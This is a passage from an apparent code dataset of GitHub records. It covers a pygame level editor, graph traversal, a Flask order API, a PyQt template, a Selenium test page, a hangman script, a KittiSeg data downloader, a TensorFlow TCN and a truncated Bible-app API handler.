y + border_width))\n \n # shows commands\n if show_commands == False:\n padding = 10\n text = FONT(30).render(\"Press SPACE to show commands\", 1, WHITE)\n x = padding\n y = HEIGHT - text.get_height() - padding\n draw_around_surface(WIN, text, x, y, padding, BLACK, WHITE, 1)\n WIN.blit(text, (padding, HEIGHT - text.get_height() - padding))\n \n elif show_commands == True:\n padding = 10\n commands = \"E: Eraser\\nQ: Show empty cells\\nS: Save current edit\\nO: Open saved edit\\nC: Clear edit\\nG: Show gridlines\"\n text = FONT(30).render(commands, 1, WHITE)\n x = padding\n y = HEIGHT - text.get_height() - padding\n draw_around_surface(WIN, text, x, y, padding, BLACK, WHITE, 1)\n WIN.blit(text, (x, y))\n \n # updates the display to show the changes\n pygame.display.flip()\n\ndef main():\n clock = pygame.time.Clock()\n \n # remove unnecessary events from event list\n pygame.event.set_blocked(None)\n pygame.event.set_allowed([pygame.QUIT, pygame.KEYUP, pygame.KEYDOWN, pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP])\n #pygame.event.set_allowed(USEREVENTS)\n \n from components.state import State\n from components.textures import TextureAtlas\n from components.tile_space import TileSpace\n from components.player import Player\n \n # GAME VARIABLES\n state = State(\"start\")\n \n player_image = pygame.Surface((40, 40))\n player_image.fill(GREEN)\n player = Player(0, 0, player_image, 5, 1)\n \n # generates a tiling grid for the game\n tiling = [[(x, y) for y in range(0, HEIGHT, TILE_SIZE)] for x in range(0, WIDTH, TILE_SIZE)]\n # tiling produces this:\n # 0, 0 40, 0 ...\n # 40,40 80,40 ...\n # ...\n # \n # tiling[a][b] returns co-ordinates: (20*a, 20*b)\n \n texture_atlas = TextureAtlas(PATH_TO_ATLAS_IMAGE)\n tile_space = TileSpace(tiling, texture_atlas, TILE_SIZE)\n \n # EDITOR MODE\n selected_group = \"walls\"\n selected_texture = \"wall\"\n show_commands = False\n \n # DEBUG MODE\n debug_mode = True\n \n #initiates game loop\n run = 1\n while run:\n \n #ticks the clock\n clock.tick(FPS)\n\n #gets mouse position\n mouse = pygame.mouse.get_pos()\n \n #for everything that the user has inputted ...\n for event in pygame.event.get():\n\n #if the \"x\" button is pressed ...\n if event.type == pygame.QUIT:\n \n #save game with shelve?\n #\n\n #ends game loop\n run = False\n\n #terminates pygame\n pygame.quit()\n\n #terminates system\n import sys\n sys.exit()\n \n elif event.type == pygame.KEYDOWN:\n if state.get_state() == \"start\":\n if event.key == pygame.K_e: # temp\n state.set_state(\"editor mode\")\n \n elif state.get_state() == \"editor mode\":\n # hot_keys for selections\n if selected_group == \"walls\":\n if event.key == pygame.K_1:\n selected_texture = \"wall\"\n elif event.key == pygame.K_2:\n selected_texture = \"wall-middle\"\n elif event.key == pygame.K_3:\n selected_texture = \"wall-left\"\n elif event.key == pygame.K_4:\n selected_texture = \"wall-bottom\"\n elif event.key == pygame.K_5:\n selected_texture = \"wall-right\"\n elif event.key == pygame.K_6:\n selected_texture = \"wall-top\"\n elif event.key == pygame.K_7:\n selected_texture = \"wall-top-left\"\n elif event.key == pygame.K_8:\n selected_texture = \"wall-bottom-left\"\n elif event.key == pygame.K_9:\n selected_texture = \"wall-bottom-right\"\n elif event.key == pygame.K_0:\n selected_texture = \"wall-top-right\"\n \n if event.key == pygame.K_s:\n from pyautogui import prompt\n name = prompt(text='Name/number of level', title='Save current level' , default='')\n if name != None:\n tile_space.save_tiling(PATH_TO_LEVELS, name)\n \n elif event.key == pygame.K_o:\n from pyautogui import prompt\n name = prompt(text='Name/number of level', title='Open level' , default='')\n if name != None:\n tile_space.load_tiling(PATH_TO_LEVELS, name)\n \n # tools\n elif event.key == pygame.K_c:\n tile_space.empty()\n \n elif event.key == pygame.K_g:\n tile_space.toggle_gridlines()\n \n elif event.key == pygame.K_q:\n tile_space.toggle_show_empty_cells()\n \n elif event.key == pygame.K_e:\n selected_texture = \"delete\"\n \n elif event.key == pygame.K_SPACE:\n show_commands = not show_commands\n \n # temp\n elif event.key == pygame.K_t:\n state.set_state(\"game\")\n \n elif state.get_state() == \"game\":\n if event.key == pygame.K_SPACE:\n player.jump()\n \n if state.get_state() == \"editor mode\":\n mouse_inputs = pygame.mouse.get_pressed()\n if mouse_inputs[0]:\n tile = tile_space.collide_tile_point(mouse[0], mouse[1])\n if tile == None:\n pass\n elif selected_texture == \"delete\":\n tile.empty()\n else:\n tile(selected_texture)\n \n pressing = pygame.key.get_pressed()\n player.update(pressing, state, tile_space)\n \n draw(WIN, state, tile_space, debug_mode, texture_atlas, selected_texture, show_commands, player)\n\nmain()","repo_name":"Nahor-Nehc/Platformer-base","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17441361514","text":"# DFS 와 BFS\nfrom collections import deque\n# DFS\ndef dfs_recur(graph, node, visited):\n visited[node] = True #재귀이므로 visited 바로 넣음\n print(node, end=\" \")\n\n for nextn in graph[node]:\n if visited[nextn] == False: # 현재 노드의 새끼 노드를 재귀 처리\n dfs_recur(graph, nextn, visited)\n\ndef dfs(graph, n, start):\n visited=[False]*(n+1)\n dfs_recur(graph, start, visited)\n\n# BFS : 너비 우선 탐색\ndef bfs(graph,n, start):\n visited = [False]*(n+1) # visited 는 안에 생성!\n q = deque() # deque 는 빠르다 -> bfs는 큐를 사용\n q.append(start)\n visited[start] = True # visited 도 바로 넣기\n\n while bool(q): # 큐가 비어있지 않는 동안\n now = q.popleft() # 큐는 popleft() 사용한다\n print(now, end=\" \")\n for node in graph[now]: # 현재노드의 새끼노드를 처리\n if visited[node] == False:\n visited[node] = True\n q.append(node)\n\nn, m, v = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a,b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in graph:\n i.sort()\n\ndfs(graph, n, v)\nprint()\nbfs(graph, n, v)","repo_name":"dodoyeon/SW_Academy","sub_path":"swtest_blog/bj_1260db.py","file_name":"bj_1260db.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35085246257","text":"\nfrom app import app,db\nfrom flask import request\nfrom app.models.tables import Products,Orders\nfrom app.models.marshmallow import OrdersSchema\nimport uuid\n\nfrom app.models.decorators import fields_required,token_required,perfil_required\n\n\n@app.route('/makeOrder',methods=['POST'])\n@token_required()\n@perfil_required(\"CLIENTE\")\n@fields_required(['publicId_product','amount'],isList=True)\ndef make_order(user,fields):\n orderNumber = str(uuid.uuid4().int & (1<<30)-1)\n\n dbList = []\n for item in fields:\n publicId = str(uuid.uuid4())\n orde = Orders(publicId=publicId,publicId_product=item['publicId_product'],orderNumber=orderNumber,amount=item[\"amount\"],publicId_costumer=user.publicId)\n valid = orde.is__valid()\n if not valid[0]:\n return {\"status\":False,\"message\":valid[1]}\n dbList.append(orde)\n\n for item in dbList:\n db.session.add(item)\n\n db.session.commit()\n return {\"status\":True,\"message\":\"order made successfully!\",'orderNumber':orderNumber}\n\n@app.route('/getOrder',methods=['POST'])\n@token_required()\n@perfil_required(\"LOJA\")\n@fields_required(['orderNumber'])\ndef get_order(user,fields):\n\n sc = OrdersSchema()\n itens = Orders.query.filter_by(orderNumber = fields['orderNumber']).all()\n \n\n return {\"status\":True,\"message\":\"OK\",\"products\":[sc.dump(x) for x in itens]}\n","repo_name":"melquelima/ApiLojaVirtual","sub_path":"app/controllers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26915657125","text":"import sys\r\nfrom PyQt4 import QtCore, QtGui\r\nfrom PyQt4.QtOpenGL import *\r\nfrom OpenGL.GL import *\r\n\r\nclass TemplateUI(QtGui.QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super(TemplateUI, self).__init__(parent)\r\n self.initUi()\r\n\r\n def initUi(self):\r\n # Main layout\r\n mainLayout = QtGui.QVBoxLayout()\r\n butLabLayout = QtGui.QHBoxLayout()\r\n \r\n # QLabel\r\n self.label = QtGui.QLabel('Hit Him:\\t')\r\n butLabLayout.addWidget(self.label)\r\n \r\n # QComboBox\r\n self.comboBox = QtGui.QComboBox()\r\n comboList = ['pushButton', 'comboBox']\r\n self.comboBox.addItems(comboList)\r\n mainLayout.addWidget(self.comboBox)\r\n\r\n # QPushButton\r\n self.pushButton = QtGui.QPushButton(\"Hit Me!!!!!!!!\")\r\n butLabLayout.addWidget(self.pushButton)\r\n mainLayout.addLayout(butLabLayout)\r\n \r\n # QPlainTextEdit\r\n self.plainTextEdit = QtGui.QPlainTextEdit()\r\n mainLayout.addWidget(self.plainTextEdit)\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n self.setLayout(mainLayout)\r\n self.setWindowTitle(\"Template\")\r\n\r\nif __name__ == '__main__':\r\n app = QtGui.QApplication(sys.argv)\r\n temp = TemplateUI()\r\n temp.show()\r\n help(app)\r\n app.exec_()","repo_name":"vipul-rathod/AppleTree","sub_path":"PyQt_Templates.py","file_name":"PyQt_Templates.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9393486769","text":"#coding=utf-8\n\nimport time\nfrom common.base import Base\nfrom common.logger import logger as log\n\n\nclass PublishArticlePage(Base):\n\n qfzs_tab_loc = (\"xpath\", \"//*[@id='step1']/div[2]/a/span\") # 定位“群发助手”\n pub_list_loc=(\"xpath\",\"//a[@class='subnav-hotspot'and @href='/market/promotion']\")#定位发布文章菜单\n pub_btn_loc=(\"xpath\",\"//span[contains(text(),'发布文章')and @class='ng-scope']\")#定位发布文章按钮\n title_loc = (\"xpath\", \"//*[@id='app']/div/div/market/layout/div/div/layout-body/main/section/div/promotion-add/div/div[1]/form/promotion-article/div/div[1]/inputcell/div/div/div[2]/input\") # 定位文章标题输入框\n #title_loc=(\"xpath\",\"//inputcell[@class='col-lg-10 ng-isolate-scope']\")#定位文章标题输入框\n cover_loc=(\"xpath\",\"//input[@name='imageUpload']\")#定位封面图片上传按钮\n #content_loc=(\"xpath\",\"//textarea[@id='ueditor_textarea_editorValue']\")\n content_loc=(\"xpath\",\"//iframe[@id='ueditor_1']\")#定位文章内容文本框\n save_loc=(\"xpath\",\"//span[contains(text(),'保存')]\")\n\n def main(self,title,coverpath,acontent):\n log.info(\"begin article page\")\n self.click(PublishArticlePage.qfzs_tab_loc)#点击群发助手\n time.sleep(5)\n self.click(PublishArticlePage.pub_list_loc)#点击发布文章菜单\n time.sleep(2)\n self.click(PublishArticlePage.pub_btn_loc)#点击发布文章按钮\n time.sleep(5)\n self.sendKeys(PublishArticlePage.title_loc,title)#输入文章标题\n time.sleep(2)\n self.sendKeys(PublishArticlePage.cover_loc,coverpath)#上传封面图片\n time.sleep(10)\n #js1 = \"document.documentElement.scrollTop=10000\"\n #self.driver.execute_script(js1)\n #self.driver.switch_to_frame(PublishArticlePage.content_loc)\n self.inputTextArea(None, acontent)\n #self.sendKeys(PublishArticlePage.content_loc,acontent)#输入文章内容\n time.sleep(2)\n self.click(PublishArticlePage.save_loc)#点击保存\n log.info(\"end article page\")\n\n\n\n","repo_name":"loveyshelly/yy","sub_path":"page/publish_article_page.py","file_name":"publish_article_page.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31599283331","text":"#%% defined a list of possible words\nword_list = ['mango', 'banana', 'pear', 'apple', 'coconut']\n\n#%% choose a random word from list\nimport random\n\nword = random.choice(word_list)\nprint(word)\n\n#%% ask the user for the input\nguess = input('enter a single letter: ')\n\n\n# %% check that the input is a single character\nif guess.isalpha() and len(guess) == 1:\n print('Good guess!')\nelse:\n print('Oops! That is not a valid input.')\n","repo_name":"Yurishizu9/hangman","sub_path":"milestone_2.py","file_name":"milestone_2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18138967219","text":"\"\"\"Download data relevant to train the KittiSeg model.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport sys\nimport os\nimport subprocess\n\nimport zipfile\n\n\nfrom six.moves import urllib\nfrom shutil import copy2\n\nimport argparse\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\nsys.path.insert(1, 'incl')\n\n# Please set kitti_data_url to the download link for the Kitti DATA.\n#\n# You can obtain by going to this website:\n# http://www.cvlibs.net/download.php?file=data_road.zip\n#\n# Replace 'http://kitti.is.tue.mpg.de/kitti/?????????.???' by the\n# correct URL.\n\n\nvgg_url = 'ftp://mi.eng.cam.ac.uk/pub/mttt2/models/vgg16.npy'\n\n\ndef get_pathes():\n \"\"\"\n Get location of `data_dir` and `run_dir'.\n\n Defaut is ./DATA and ./RUNS.\n Alternativly they can be set by the environoment variabels\n 'TV_DIR_DATA' and 'TV_DIR_RUNS'.\n \"\"\"\n\n if 'TV_DIR_DATA' in os.environ:\n data_dir = os.path.join(['hypes'], os.environ['TV_DIR_DATA'])\n else:\n data_dir = \"DATA\"\n\n if 'TV_DIR_RUNS' in os.environ:\n run_dir = os.path.join(['hypes'], os.environ['TV_DIR_DATA'])\n else:\n run_dir = \"RUNS\"\n\n return data_dir, run_dir\n\n\ndef download(url, dest_directory):\n filename = url.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n\n logging.info(\"Download URL: {}\".format(url))\n logging.info(\"Download DIR: {}\".format(dest_directory))\n\n def _progress(count, block_size, total_size):\n prog = float(count * block_size) / float(total_size) * 100.0\n sys.stdout.write('\\r>> Downloading %s %.1f%%' %\n (filename, prog))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(url, filepath,\n reporthook=_progress)\n print()\n return filepath\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--kitti_url', default='', type=str)\n args = parser.parse_args()\n\n kitti_data_url = args.kitti_url\n\n data_dir, run_dir = get_pathes()\n\n vgg_weights = os.path.join(data_dir, 'weights', 'vgg16.npy')\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n # Download VGG DATA\n if not os.path.exists(vgg_weights):\n download_command = \"wget {} -P {}\".format(vgg_url, data_dir)\n logging.info(\"Downloading VGG weights.\")\n download(vgg_url, data_dir)\n else:\n logging.warning(\"File: {} exists.\".format(vgg_weights))\n logging.warning(\"Please delete to redownload VGG weights.\")\n\n data_road_zip = os.path.join(data_dir, 'data_road.zip')\n\n # Download KITTI DATA\n if not os.path.exists(data_road_zip):\n if kitti_data_url == '':\n logging.error(\"Data URL for Kitti Data not provided.\")\n url = \"http://www.cvlibs.net/download.php?file=data_road.zip\"\n logging.error(\"Please visit: {}\".format(url))\n logging.error(\"and request Kitti Download link.\")\n logging.error(\"Rerun scipt using\"\n \"'python download_data.py' --kitti_url [url]\")\n exit(1)\n if not kitti_data_url[-19:] == 'kitti/data_road.zip':\n logging.error(\"Wrong url.\")\n url = \"http://www.cvlibs.net/download.php?file=data_road.zip\"\n logging.error(\"Please visit: {}\".format(url))\n logging.error(\"and request Kitti Download link.\")\n logging.error(\"Rerun scipt using\"\n \"'python download_data.py' --kitti_url [url]\")\n exit(1)\n else:\n logging.info(\"Downloading Kitti Road Data.\")\n download(kitti_data_url, data_dir)\n\n # Extract and prepare KITTI DATA\n logging.info(\"Extracting kitti_road data.\")\n zipfile.ZipFile(data_road_zip, 'r').extractall(data_dir)\n kitti_road_dir = os.path.join(data_dir, 'data_road/')\n\n logging.info(\"Preparing kitti_road data.\")\n\n train_txt = \"data/train3.txt\"\n val_txt = \"data/val3.txt\"\n testing_txt = \"data/testing.txt\"\n copy2(train_txt, kitti_road_dir)\n copy2(val_txt, kitti_road_dir)\n copy2(testing_txt, kitti_road_dir)\n\n logging.info(\"All data have been downloaded successful.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MarvinTeichmann/KittiSeg","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":904,"dataset":"github-code","pt":"53"} +{"seq_id":"26897174198","text":"from typing import List\n\ndef spiralOrder(matrix: List[List[int]]) -> List[int]:\n res = []\n left, right = 0, len(matrix[0])\n top, bottom = 0, len(matrix)\n\n while left < right and top < bottom:\n # get every i in the top row\n for i in range(left, right):\n res.append(matrix[top][i])\n top += 1\n # get every i in the right col\n for i in range(top, bottom):\n res.append(matrix[i][right - 1])\n right -= 1\n if not (left < right and top < bottom):\n break\n # get every i in the bottom row\n for i in range(right - 1, left - 1, -1):\n res.append(matrix[bottom - 1][i])\n bottom -= 1\n # get every i in the left col\n for i in range(bottom - 1, top - 1, -1):\n res.append(matrix[i][left])\n left += 1\n\n return res\n\nmatrix = [[1,2,3],[4,5,6],[7,8,9]]\nprint(spiralOrder(matrix))\n\nmatrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nprint(spiralOrder(matrix))\n\n\"\"\"\nこの関数 `spiralOrder` は、与えられた2次元行列 (matrix) の要素を螺旋状に読み取り、それらの要素を1次元のリストとして返します。\n\n**大まかな説明**:\n`spiralOrder` 関数は、行列の外周から内側に向かって、上の行、右の列、下の行、左の列の順に要素を読み取り���それを結果のリスト `res` に追加していきます。この操作を行列の全ての要素を読み取るまで繰り返します。\n\n**部分毎の説明**:\n\n1. `res = []`: 結果を格納する空のリストを初期化します。\n2. 初期値設定: \n - `left, right`: 行列の左端と右端を示すインデックスです。\n - `top, bottom`: 行列の上端と下端を示すインデックスです。\n3. `while left < right and top < bottom`: このループは、まだ読み取る要素が存在する限り続きます。\n4. 上の行の要素を読み取り:\n ```python\n for i in range(left, right):\n res.append(matrix[top][i])\n top += 1\n ```\n5. 右の列の要素を読み取り:\n ```python\n for i in range(top, bottom):\n res.append(matrix[i][right - 1])\n right -= 1\n ```\n6. 以下の条件 `if not (left < right and top < bottom):` は、行や列の要素を読み取った後に、まだ読み取る要素が残っているかどうかをチェックします。もし残っていなければ、ループを終了します。\n7. 下の行の要素を読み取り:\n ```python\n for i in range(right - 1, left - 1, -1):\n res.append(matrix[bottom - 1][i])\n bottom -= 1\n ```\n8. 左の列の要素を読み取り:\n ```python\n for i in range(bottom - 1, top - 1, -1):\n res.append(matrix[i][left])\n left += 1\n ```\n9. `return res`: 最後に、結果のリスト `res` を返します。\n\nこの関数は、行列の外周から開始して、中央に向かって螺旋状に要素を読み取り、それを結果のリストに追加していきます。\n\"\"\"","repo_name":"majikojima/neetcode","sub_path":"17_MathAndGeometry/04_SpiralMatrix.py","file_name":"04_SpiralMatrix.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26105942972","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#================================================================\n# God Bless You.\n#\n# file name: tcn.py\n# author: klaus\n# email: klaus.cheng@qq.com\n# created date: 2018/08/13\n# description: ref to https://medium.com/the-artificial-impos\n# tor/notes-understanding-tensorflow-part-3-7f66\n# 33fcc7c7\n#\n#================================================================\n\nimport tensorflow as tf\nfrom .nn import CausalConv1D\n\n\nclass TemporalBlock(tf.layers.Layer):\n def __init__(self,\n n_outputs,\n kernel_size,\n strides,\n dilation_rate,\n dropout=0.2,\n trainable=True,\n name=None,\n dtype=None,\n activity_regularizer=None,\n **kwargs):\n super(TemporalBlock, self).__init__(\n trainable=trainable,\n dtype=dtype,\n activity_regularizer=activity_regularizer,\n name=name,\n **kwargs)\n self.dropout = dropout\n self.n_outputs = n_outputs\n self.conv1 = CausalConv1D(\n n_outputs,\n kernel_size,\n strides=strides,\n dilation_rate=dilation_rate,\n activation=tf.nn.relu,\n name=\"conv1\")\n self.conv2 = CausalConv1D(\n n_outputs,\n kernel_size,\n strides=strides,\n dilation_rate=dilation_rate,\n activation=tf.nn.relu,\n name=\"conv2\")\n self.down_sample = None\n\n def build(self, input_shape):\n channel_dim = 2\n self.dropout1 = tf.layers.Dropout(\n self.dropout,\n [tf.constant(1),\n tf.constant(1),\n tf.constant(self.n_outputs)])\n self.dropout2 = tf.layers.Dropout(\n self.dropout,\n [tf.constant(1),\n tf.constant(1),\n tf.constant(self.n_outputs)])\n if input_shape[channel_dim] != self.n_outputs:\n # self.down_sample = tf.layers.Conv1D(\n # self.n_outputs, kernel_size=1,\n # activation=None, data_format=\"channels_last\", padding=\"valid\")\n self.down_sample = tf.layers.Dense(self.n_outputs, activation=None)\n\n def call(self, inputs, training=True):\n x = self.conv1(inputs)\n x = tf.contrib.layers.layer_norm(x)\n x = self.dropout1(x, training=training)\n x = self.conv2(x)\n x = tf.contrib.layers.layer_norm(x)\n x = self.dropout2(x, training=training)\n if self.down_sample is not None:\n inputs = self.down_sample(inputs)\n return tf.nn.relu(x + inputs)\n\n\nclass TemporalConvNet(tf.layers.Layer):\n def __init__(self,\n num_channels,\n kernel_size=2,\n dropout=0.2,\n trainable=True,\n name=None,\n dtype=None,\n activity_regularizer=None,\n **kwargs):\n super(TemporalConvNet, self).__init__(\n trainable=trainable,\n dtype=dtype,\n activity_regularizer=activity_regularizer,\n name=name,\n **kwargs)\n self.layers = []\n num_levels = len(num_channels)\n for i in range(num_levels):\n dilation_size = 2**i\n out_channels = num_channels[i]\n self.layers.append(\n TemporalBlock(\n out_channels,\n kernel_size,\n strides=1,\n dilation_rate=dilation_size,\n dropout=dropout,\n name=\"tblock_{}\".format(i)))\n\n def call(self, inputs, training=True):\n outputs = inputs\n for layer in self.layers:\n outputs = layer(outputs, training=training)\n return outputs\n","repo_name":"beforeifall/lip","sub_path":"lipreading/model/tcn/tcn.py","file_name":"tcn.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6405795225","text":"import base64\nimport glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport re\nimport urllib\nfrom datetime import datetime, timezone\nfrom pathlib import Path\n\nimport config\nfrom http import HTTPStatus\n\nfrom http.server import SimpleHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nfrom db.BiblesSqlite import BiblesSqlite, Bible, MorphologySqlite\nfrom db.DevotionalSqlite import DevotionalSqlite\nfrom db.ToolsSqlite import Commentary, LexiconData, IndexesSqlite, Book, Lexicon, CrossReferenceSqlite, DictionaryData, \\\n SearchSqlite, VerseData\nfrom util.BibleBooks import BibleBooks\nfrom util.BibleVerseParser import BibleVerseParser\nfrom util.CatalogUtil import CatalogUtil\nfrom util.LexicalData import LexicalData\n\n\nclass ApiRequestHandler(SimpleHTTPRequestHandler):\n def list_directory(self, path):\n self.send_error(\n HTTPStatus.NOT_FOUND,\n \"Not found\")\n return None\n\nclass RemoteApiHandler(ApiRequestHandler):\n\n jsonData = {}\n\n ONE_SEC = \"1\"\n ONE_HOUR = \"3600\"\n ONE_DAY = \"86400\"\n ONE_MONTH = \"2592000\"\n ONE_YEAR = \"31536000\"\n\n def __init__(self, *args, **kwargs):\n self.logger = logging.getLogger('uba')\n config.internet = True\n config.showHebrewGreekWordAudioLinks = False\n try:\n super().__init__(*args, directory=\"htmlResources\", **kwargs)\n except Exception as ex:\n print(\"Could not run init\")\n print(ex)\n\n def do_POST(self):\n self.handleBadRequests()\n\n def do_HEAD(self):\n self.handleBadRequests()\n\n def handleBadRequests(self):\n self.jsonData = {'status': 'Error', 'message': 'Unsupported method'}\n self.sendJsonData()\n\n def do_OPTIONS(self):\n self.send_response(200)\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header(\"Access-Control-Allow-Headers\", '*')\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\n self.end_headers()\n\n def sendJsonData(self):\n data = json.dumps(self.jsonData)\n self.commonHeader()\n self.wfile.write(bytes(data, \"utf8\"))\n\n def commonHeader(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/json\")\n self.send_header(\"charset\", \"UTF-8\")\n self.send_header(\"Pragma\", \"no-cache\"),\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.send_header(\"Cache-Control\", \"max-age=\" + RemoteApiHandler.ONE_DAY + \", stale-while-revalidate=\" + RemoteApiHandler.ONE_DAY),\n self.end_headers()\n\n def sendError(self, message):\n self.jsonData = {'status': 'Error', 'message': message}\n\n def do_GET(self):\n try:\n self.clientIP = self.client_address[0]\n self.processRequest(self.path)\n except Exception as ex:\n self.jsonData = {'status': 'Error', 'exception': str(ex)}\n self.sendJsonData()\n\n def processRequest(self, request):\n self.securityCheck()\n query = parse_qs(urlparse(request).query)\n self.jsonData = {'status': \"OK\"}\n if \"?\" in request:\n request = request.split(\"?\")[0]\n self.jsonData['request'] = request\n config.marvelData = 'marvelData'\n if query:\n self.jsonData['query'] = query\n if \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n if os.path.exists('marvelData_' + lang):\n config.marvelData = 'marvelData_' + lang\n cmd = request[1:].split(\"/\")\n if len(cmd) > 0:\n command = cmd[0].lower()\n if command == \"data\":\n self.processDataCommand(cmd, query)\n elif command == \"list\":\n self.processListCommand(cmd)\n elif command == \"bible\":\n self.processBibleCommand(cmd)\n elif command == \"compare\":\n self.processCompareCommand(cmd, query)\n elif command == \"book\":\n self.processBookCommand(cmd)\n elif command == \"commentary\":\n self.processCommentaryCommand(cmd)\n elif command == \"lexicon\":\n self.processLexiconCommand(cmd)\n elif command == \"lexiconreverse\":\n self.processLexiconReverseCommand(cmd)\n elif command == \"devotional\":\n self.processDevotionalCommand(cmd)\n elif command == \"dictionary\":\n self.processDictionaryCommand(cmd)\n elif command == \"crossreference\":\n self.processCrossReferenceCommand(cmd)\n elif command == \"crossreference\":\n self.processCrossReferenceCommand(cmd)\n elif command == \"search\":\n self.processSearchCommand(cmd, query)\n elif command == \"morphology\":\n self.processMorphologyCommand(cmd)\n elif command == \"searchtool\":\n self.processSearchToolCommand(cmd)\n elif command == \"discourse\":\n self.processDiscourseCommand(cmd)\n\n # /data/bible/abbreviations?lang=[eng,sc,tc]\n # /data/bible/book2number?lang=[eng,sc,tc]\n # /data/bible/chapters\n # /data/bible/verses\n # /data/bible/books/TRLIT\n # /data/lex/H3068\n def processDataCommand(self, cmd, query):\n if cmd[1].lower() == \"bible\":\n if cmd[2].lower() == \"abbreviations\":\n lang = \"eng\"\n if query and \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n data = []\n for key, value in BibleBooks().abbrev[lang].items():\n data.append({'i': key, 'a': value[0], 'n': value[1]})\n self.jsonData['data'] = data\n elif cmd[2].lower() == \"book2number\":\n lang = \"eng\"\n if query and \"lang\" in query.keys():\n lang = query[\"lang\"][0]\n data = []\n for key, value in BibleBooks.name2number.items():\n data.append({'b': key, 'n': value})\n self.jsonData['data'] = data\n elif cmd[2].lower() == \"chapters\":\n self.jsonData['data'] = BibleBooks.chapters\n elif cmd[2].lower() == \"verses\":\n self.jsonData['data'] = BibleBooks.verses\n elif cmd[2].lower() == \"books\":\n self.jsonData['data'] = [book for book in BiblesSqlite().getBookList(cmd[3])]\n elif cmd[1].lower() == \"lex\":\n self.jsonData['data'] = LexicalData.getLexicalDataRaw(cmd[2])\n\n def securityCheck(self):\n if config.apiServerClientId == '':\n return\n else:\n clients = {config.apiServerClientId: {'secret': self.encodeSecret(config.apiServerClientSecret)}}\n auth = self.headers['Authorization']\n if auth:\n basic, creds = auth.split()\n clientId, clientSecret = base64.b64decode(creds).decode().split(':')\n if clientId in clients.keys():\n if clientSecret == clients[clientId]['secret']:\n return\n raise Exception('Unauthorized')\n\n def encodeSecret(self, secret):\n secret = secret + str(datetime.now(timezone.utc).month)\n secret = hashlib.md5(secret.encode())\n secret = secret.hexdigest()\n return secret\n\n # /bible\n # /bible/KJV/43/3\n # /bible/KJV/44/3/16\n def processBibleCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [bible for bible in BiblesSqlite().getBibleList()]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Bible command\")\n return\n if len(cmd) == 4:\n if cmd[1] in [\"MOB\", \"MAB\", \"MIB\", \"MPB\", \"MTB\"]:\n book, chapter, scripture = Bible(cmd[1]).readTextChapterRaw(cmd[2], cmd[3])\n data = re.findall(\"(.*?)\", scripture)\n verses = []\n count = 1\n for passage in data:\n verses.append([cmd[2], cmd[3], count, passage])\n count += 1\n else:\n verses = BiblesSqlite().readTextChapter(cmd[1], cmd[2], cmd[3])\n elif len(cmd) == 5:\n verses = [BiblesSqlite().readTextVerse(cmd[1], cmd[2], cmd[3], cmd[4])]\n rows = []\n for verse in verses:\n rows.append({'b': verse[0], 'c': verse[1], 'v': verse[2], 't': verse[3]})\n self.jsonData['data'] = rows\n\n # /book\n # /book/Hymn+Lyrics+-+English\n # /book/Hymn+Lyrics+-+English/Amazing+Grace\n def processBookCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [book for book in CatalogUtil.getBooks()]\n return\n elif len(cmd) < 2:\n self.sendError(\"Invalid Book command\")\n return\n module = cmd[1].replace(\"+\", \" \")\n module = module.replace(\"?\", \"?\")\n module = urllib.parse.unquote(module)\n if len(cmd) == 2:\n self.jsonData['data'] = [topic for topic in Book(module).getTopicList()]\n else:\n chapter = cmd[2].replace(\"+\", \" \")\n chapter = chapter.replace(\"?\", \"?\")\n chapter = urllib.parse.unquote(chapter)\n # chapter = chapter.replace(\"%3C\", \"<\")\n # chapter = 